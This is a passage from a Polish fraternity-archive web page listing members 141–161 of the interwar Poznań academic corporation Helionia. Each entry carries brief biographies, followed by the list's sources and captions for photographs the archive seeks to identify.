 141. Jan Władysław Twardowski , (23 września 1910 w Będzinie - ) student i absolwent 1939 farmacji UP, członek Zarządu Koła Farmaceutów 1936/37, farmaceuta
 142. Wiktor Tynowski,
 143. Przemysław Warmiński, (14 marca 1908 w Bydgoszczy - 26 września 1939 w Warszawie) s. Emila Józefa oraz Haliny z Młynarzów, student i absolwent prawa, c. 1930 (?) Helionia, później w Baltii, działacz narodowy, prezes Młodzieży Wszechpolskiej 1930/31, przywódca ONR w Poznaniu, wieloletni zawodnik AZS Poznań, zdobywca dwóch tytułów mistrza Polski w tenisie (1930 w deblu, 1932 w mikście), czterokrotny reprezentant kraju w Pucharze Davisa 1928-32, jako zawodnik AZS uczestnik ligowych rozgrywkach hokejowych, m.in. zdobywając mistrzostwo Polski w 1934, od 1938 trener reprezentacji narodowej w hokeju, pracował jako dziennikarz m.in. w “Głosie Akademickim”, “ABC - Nowiny Codzienne”, “Kurierze Warszawskim” oraz katowickiej “Polonii”, ppor. rez., poległ w wojnie obronnej 1939 w obronie Warszawy, odznaczony Krzyżem Walecznych
 144. Janusz Wawrowski, student Wydziału Matematyczno-Przyrodniczego UP 1939, skarbnik sem. let. 1938/39
 145. Jan Winnicki, (1909-1995) student WSH, c. 1929 (?)
 146. J. Wiszniewski,
 147. Teobald Wnuk, ( - lata 90-te)
 148. Stefan Wowczak, student Wydziału Medycznego UP 1939
 149. Wojciech Wyganowski, ( - 1993/94) wiceprezes sem. zim. 1927/28, kierownik Poznańskiego Komitetu Redakcyjnego “Wiadomości Korporacyjne” [być może Wojciech Wyganowski, herbu Łodzia, s. Zygmunta i Idy z d. Hulewicz]
 150. Tadeusz (Łada-)Zabłocki, (17 listopada 1904 w Kijowie - 13 marca 1997 w Londynie) gospodarz sem. zim. 1926/27, członek Zarządu Koła Prawników i Ekonomistów, mgr praw, po wojnie na emigracji w Wielkiej Brytanii
 151. Władysław Eugeniusz Zajączkowski, (11 grudnia 1907 w Żurawnie w woj. stanisławowskim - 1940 w Katyniu) s. Tadeusza i Ireny z Terlikowskich, student i absolwent 1930 prawa UP, olderman III trymestr 1928/29, prezes sem. zim. 1929/30, wiceprezes sem. let. 1929/30, wiceprezes Koła Prawników i Ekonomistów 1926, przewodniczący Sądu Koleżeńskiego Koła Prawników i Ekonomistów 1929/30, podprokurator w Gnieźnie, sędzia Sądu Okręgowego w Warszawie, aresztowany przez NKWD w Dubnie na Wołyniu, osadzony w obozie w Kozielsku, zamordowany przez NKWD
 152. Stanisław Zaleski, po wojnie na emigracji w Wielkiej Brytanii (?)
 153. Zbigniew Zamoyski, student farmacji UP, sekretarz sem. zim. 1934/35, prezes sem. zim. 1935/36 i sem. zim. 1936/37
 154. Janusz Zawadzki, sekretarz III trymestr (od maja) 1924/25 [być może tożsamy z Jerzym Zawadzkim]
 155. Jerzy Zawadzki, barwiarz skreślony 1927 [być może tożsamy z Januszem Zawadzkim]
 156. Leopold Zielenkiewicz, akt. 1928/29

  Tadeusz Zięciak (?), lipiec 1924 r.

 157. Tadeusz Zięciak, student i absolwent leśnictwa UP, sekretarz I i II trymestr 1924/25 oraz III trymestr 1924/25

 158. Znaniecki, c. ok. 1929, skreślony 1930
 159. Stefan Żelarski, wystąpił 1926
 160. Andrzej Żukowski, prezes sem. let. 1931/32, olderman sem. zim. i sem. let. 1933/34, aresztowany przez Niemców w Łodzi w maju/czerwcu 1940, dalszy los nieznany
 161. Stanisław Życzyński, założcyciel Helionii

Listę członków opracowano na podstawie:

1) Krzysztof A. Tyszka, Lista członków Polskiej Korporacji Akademickiej Helionia (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 87 i n.,
2) Rafał Sierchuła, Konwent Helionia. Zarys działalności, maszynopis; Rafał Sierchuła, Lista członków K! Helionia (uzupełnienia), maszynopis 4 II 2014;
3) materiałów archiwalnych z Archiwum UAM,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Helionia.

Fotografie do identyfikacji

Członkowie honorowi Helionii.

9.1. Członkowie honorowi Helionii.

Fotografia przedstawia prezesa i członków honorowych Helionii w czasie jednej z uroczystości korporacyjnych. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także określenie okoliczności, miejsca i daty wykonania fotografii.

Komers X-lecia Helionii, w środku siedzi prezes Koła Filistrów dr Mikołaj Kiedacz, czwarty od lewej na podłodze Lech Neyman, piąty Stanisław Kasznica junior, dziesiąty-przedostatni Zdzisław Hawelski, Poznań marzec 1933 r.

9.2. Helionia w 1933 r.

Fotografia przedstawia Heliończyków w czasie komersu X-lecia Helionii. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także określenie okoliczności, miejsca i daty wykonania fotografii.

Na podłodze od lewej siedzi dziesiąty (przedostatni) Zdzisław Hawelski, identyfikacja dnia 18 XI 2014 r. przez dra Rafała Sierchułę.

Heliończycy na wieczorku towarzyskim ok. 1930 r. (?).

9.3. Heliończycy na wieczorku towarzyskim ok. 1930 r. (?).

Fotografia przedstawia grupę Heliończyków na wieczorku towarzyskim ok. 1930 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu, jak także określenie okoliczności, miejsca i daty wykonania fotografii.

Stoją od lewej drugi Zdzisław Hawelski i trzeci Lech Neyman, identyfikacja dnia 18 XI 2014 r. przez dra Rafała Sierchułę.

Zjazd Helionii z okazji 55-lecia, Poznań 27 V 1978 r.

9.4. Zjazd Helionii z okazji 55-lecia, Poznań 27 V 1978 r.

Fotografia przedstawia grupę członków Helionii w czasie rocznicowego zjazdu w 1978 r.Istotne byłoby ustalenie tożsamości osób na zdjęciu.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2010 r.
Ostatnia zmiana: 29 VI 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja “Helionia” (Poznań), (na:) www.archiwumkorporacyjne.pl, stan 29 VI 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }